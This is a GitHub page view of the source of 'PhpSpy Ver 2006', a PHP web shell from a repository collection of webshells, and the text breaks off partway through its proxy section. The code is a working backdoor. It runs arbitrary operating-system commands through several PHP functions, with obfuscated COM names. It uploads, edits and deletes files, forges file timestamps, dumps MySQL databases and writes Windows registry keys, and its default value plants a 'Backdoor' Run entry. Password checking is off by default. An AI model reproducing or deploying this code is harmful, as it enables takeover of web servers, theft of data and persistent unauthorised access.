forked from JohnTroony/php-webshells
-
Notifications
You must be signed in to change notification settings - Fork 0
/
PhpSpy Ver 2006.php
1309 lines (1194 loc) · 47 KB
/
PhpSpy Ver 2006.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?php
/*
+--------------------------------------------------------------------------+
| str_replace(".", "", "P.h.p.S.p.y") Version:2006 |
| Codz by Angel |
| (c) 2004 Security Angel Team |
| http://www.4ngel.net |
| ======================================================================== |
| Team: http://www.4ngel.net |
| http://www.bugkidz.org |
| Email: [email protected] |
| Date: Mar 21st 2005 |
| Thx All The Fantasy of Wickedness's members |
| Thx FireFox (http://www.molyx.com) |
+--------------------------------------------------------------------------+
*/
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check'] = "0";
// 如果需要密码验证,请修改登陆密码
$admin['pass'] = "angel";
/*===================== 配置结束 =====================*/
// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
$self = $_SERVER['PHP_SELF'];
$dis_func = get_cfg_var("disable_functions");
/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$self."\">三秒后自动退出或单击这里退出程序界面 >>></a></span>";
exit;
}
if ($_POST['do'] == 'login') {
$thepass=trim($_POST['adminpass']);
if ($admin['pass'] == $thepass) {
setcookie ("adminpass",$thepass,time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$self."\">三秒后自动跳转或单击这里进入程序界面 >>></a></span>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
// 查看PHPINFO
if ($_GET['action'] == "phpinfo") {
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>";
exit;
}
// 在线代理
if (isset($_POST['url'])) {
$proxycontents = @file_get_contents($_POST['url']);
echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";
exit;
}
// 下载文件
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "<script>alert('你要下的文件不存在!')</script>";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($downfile));
@readfile($downfile);
exit;
}
}
// 直接下载备份数据库
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出错: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."\r\n";
}
}
mysql_close();
exit;
}
// 程序目录
$pathname=str_replace('\\','/',dirname(__FILE__));
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">注册表操作</a>" : "";
$tb = new FORMS;
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PhpSpy Ver 2006</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
for (var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
function really(d,f,m,t) {
if (confirm(m)) {
if (t == 1) {
window.location.href='?dir='+d+'&deldir='+f;
} else {
window.location.href='?dir='+d+'&delfile='+f;
}
}
}
</SCRIPT>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<?php
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
$tb->tdbody('<a href="?action=logout">注销会话</a> | <a href="?action=dir">返回PhpSpy目录</a> | <a href="?action=phpenv">PHP环境变量</a> | <a href="?action=proxy">在线代理</a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | <a href="?action=sql">SQL Query</a> | <a href="?action=sqlbak">MySQL Backup</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
$tb->headerform(array('method'=>'GET','content'=>'<p>程序路径: '.$pathname.'<br>当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>跳转目录: '.$tb->makeinput('dir').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗'));
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit')));
$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b>\n";
// 删除文件
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!";
} else {
echo basename($delfile)." 文件已不存在!";
}
}
// 删除目录
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir";
if (!file_exists("$deldirs")) {
echo "$deldir 目录已不存在!";
} else {
echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!";
}
}
// 创建目录
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if (file_exists("$mkdirs")) {
echo "该目录已存在!";
} else {
echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!";
@chmod("$mkdirs",0777);
}
}
}
// 上传文件
elseif ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!";
}
// 编辑文件
elseif ($_POST['do'] == 'doeditfile') {
if (!empty($_POST['editfilename'])) {
$filename="$editfilename";
@$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!";
@fclose($fp);
} else {
echo "请输入想要编辑的文件名!";
}
}
// 编辑文件属性
elseif ($_POST['do'] == 'editfileperm') {
if (!empty($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!";
echo " 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
} else {
echo "请输入想要设置的属性!";
}
}
// 文件改名
elseif ($_POST['do'] == 'rename') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($newname)) {
echo "".$_POST['newname']." 已经存在,请重新输入一个!";
} else {
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名为 ".$_POST['newname']." !" : "文件名修改失败!";
}
} else {
echo "请输入想要改的文件名!";
}
}
// 克隆时间
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "要修改的文件不存在!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "要参照的文件不存在!";
} else {
$time=@filemtime($_POST['tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
}
}
}
// 自定义时间
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists($_POST['curfile'])) {
echo "要修改的文件不存在!";
} else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
}
}
}
// 连接MYSQL
elseif ($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "数据库连接成功!";
mysql_close();
} else {
echo mysql_error();
}
}
// 执行SQL语句
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL语句成功执行!" : "出错: ".mysql_error();
mysql_close();
}
// 备份操作
elseif ($_POST['do'] == 'backupmysql') {
if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
echo "请选择欲备份的数据表和备份方式!";
} else {
if ($_POST['backuptype'] == 'server') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$table = array_flip($_POST['table']);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出错: ".mysql_error();
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0], $filehandle);
fwrite($filehandle,"\n\n\n");
}
}
fclose($filehandle);
echo "数据库已成功备份到 <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
mysql_close();
} else {
echo "备份失败,请确认目标文件夹是否具有可写权限!";
}
}
}
}
// 打包下载 PS:文件太大可能非常慢
// Thx : 小花
elseif($downrar) {
if (!empty($dl)) {
$dfiles="";
foreach ($dl AS $filepath=>$value) {
$dfiles.=$filepath.",";
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(",",$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz");
echo $code;
exit;
} else {
echo "请选择要打包下载的文件!";
}
}
// Shell.Application 运行程序
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "程序已经成功执行!" : "程序运行失败!";
}
// 查看PHP配置参数状况
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
}
// 读取注册表
elseif(($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}
// 写入注册表
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($a=='0') ? "写入注册表健值成功!" : "写入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失败!";
}
// 删除注册表
elseif(($regdelete) AND !empty($_POST['delregname'])) {
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a=='0') ? "删除注册表健值成功!" : "删除 ".$_POST['delregname']." 失败!";
}
else {
echo "本程序由 <a href=\"http://www.4ngel.net\" target=\"_blank\">Security Angel</a> 小组 angel [<a href=\"http://www.bugkidz.org\" target=\"_blank\">BST</a>] 独立开发,可在 <a href=\"http://www.4ngel.net\" target=\"_blank\">www.4ngel.net</a> 下载最新版本.";
}
echo "</b></p>\n";
/*===================== 执行操作 结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
$tb->tableheader();
?>
<tr bgcolor="#cccccc">
<td align="center" nowrap width="27%"><b>文件</b></td>
<td align="center" nowrap width="16%"><b>创建日期</b></td>
<td align="center" nowrap width="16%"><b>最后修改</b></td>
<td align="center" nowrap width="11%"><b>大小</b></td>
<td align="center" nowrap width="6%"><b>属性</b></td>
<td align="center" nowrap width="24%"><b>操作</b></td>
</tr>
<?php
// 目录列表
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="1"){
if($file!=".." && $file!=".") {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><dir></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
echo " <td align=\"center\" nowrap><a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','你确定要删除 $file 目录吗? \\n\\n如果该目录非空,此次操作将会删除该目录下的所有文件!','1')\">删除</a></td>\n";
echo "</tr>\n";
$dir_i++;
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">返回上级目录</a></td>\n";
echo "</tr>\n";
}
}
}
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
<td colspan="6" height="5"></td>
</tr>
<FORM action="" method="POST">
<?
// 文件列表
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="0"){
$size=@filesize($filepath);
$size=$size/1024 ;
$size= @number_format($size, 3);
if (@filectime($filepath) == @filemtime($filepath)) {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
} else {
$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
}
@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">";
echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
echo " <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','你确定要删除 $file 文件吗?','2')\">删除</a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">改名</a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">时间</a></td>\n";
echo "</tr>\n";
$file_i++;
}
}// while
@closedir($dirs);
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('downrar','选中文件打包下载','','submit').'</td><td align="right">'.$dir_i.' 个目录 / '.$file_i.' 个文件</td></tr></table>','center',getrowbg(),'','','6');
echo "</FORM>\n";
echo "</table>\n";
}// end dir
elseif ($_GET['action'] == "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
$tb->tableheader();
$tb->formheader($action,'新建/编辑文件');
$tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile');
$tb->formfooter('1','30');
}//end editfile
elseif ($_GET['action'] == "rename") {
$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
$tb->tableheader();
$tb->formheader($action,'修改文件名');
$tb->makehidden('oldname',$dir."/".$nowfile);
$tb->makehidden('dir',$dir);
$tb->tdbody('当前文件名: '.basename($nowfile));
$tb->tdbody('改名为: '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30');
}//end rename
elseif ($_GET['action'] == "fileperm") {
$action = "?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action,'修改文件属性');
$tb->tdbody('修改 '.$file.' 的属性为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden('dir',urlencode($dir));
$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30');
}//end fileperm
elseif ($_GET['action'] == "newtime") {
$action = "?dir=".urlencode($dir);
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
$tb->tableheader();
$tb->formheader($action,'克隆文件最后修改时间');
$tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目标文件: ".$tb->makeinput('tarfile','需填完整路径及文件名'),'center','2','30');
$tb->makehidden('do','domodtime');
$tb->formfooter('','30');
$tb->formheader($action,'自定义文件最后修改时间');
$tb->tdbody('<br><ul><li>有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07<br>(该日期根据 32 位有符号整数的最小值和最大值而来)</li><li>说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!</li></ul>','left');
$tb->tdbody('当前文件名: '.$file);
$tb->makehidden('curfile',$file);
$tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30');
$tb->makehidden('do','modmytime');
$tb->formfooter('1','30');
}//end newtime
elseif ($_GET['action'] == "shell") {
$action = "??action=shell&dir=".urlencode($dir);
$tb->tableheader();
$tb->tdheader('WebShell Mode');
if (substr(PHP_OS, 0, 3) == 'WIN') {
$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
$tb->tdbody('无回显运行程序 → 文件: '.$tb->makeinput('program',$program).' 参数: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
$tb->makehidden('do','programrun');
echo "</form>\n";
}
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
$tb->tdbody('提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容.');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->tdbody('选择执行函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
?>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} elseif ($execfunc=="wscript") {
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} else {
system($_POST['command']);
}
}
?></textarea></td>
</tr>
</form>
</table>
<?php
}//end shell
elseif ($_GET['action'] == "reg") {
$action = '?action=reg';
$regname = isset($_POST['regname']) ? $_POST['regname'] : 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber';
$registre = isset($_POST['registre']) ? $_POST['registre'] : 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe';
$delregname = $_POST['delregname'];
$tb->tableheader();
$tb->formheader($action,'读取注册表');
$tb->tdbody('键值: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','读取','','submit'),'center','2','50');
echo "</form>";
$tb->formheader($action,'写入注册表');
$cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ');
$tb->tdbody('键值: '.$tb->makeinput('writeregname',$registre,'','text','56').' 类型: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' 值: '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','写入','','submit'),'center','2','50');
echo "</form>";
$tb->formheader($action,'删除注册表');
$tb->tdbody('键值: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','删除','','submit'),'center','2','50');
echo "</form>";
$tb->tablefooter();
}//end reg
elseif ($_GET['action'] == "proxy") {
$action = '?action=proxy';
$tb->tableheader();
$tb->formheader($action,'在线代理','proxyframe');
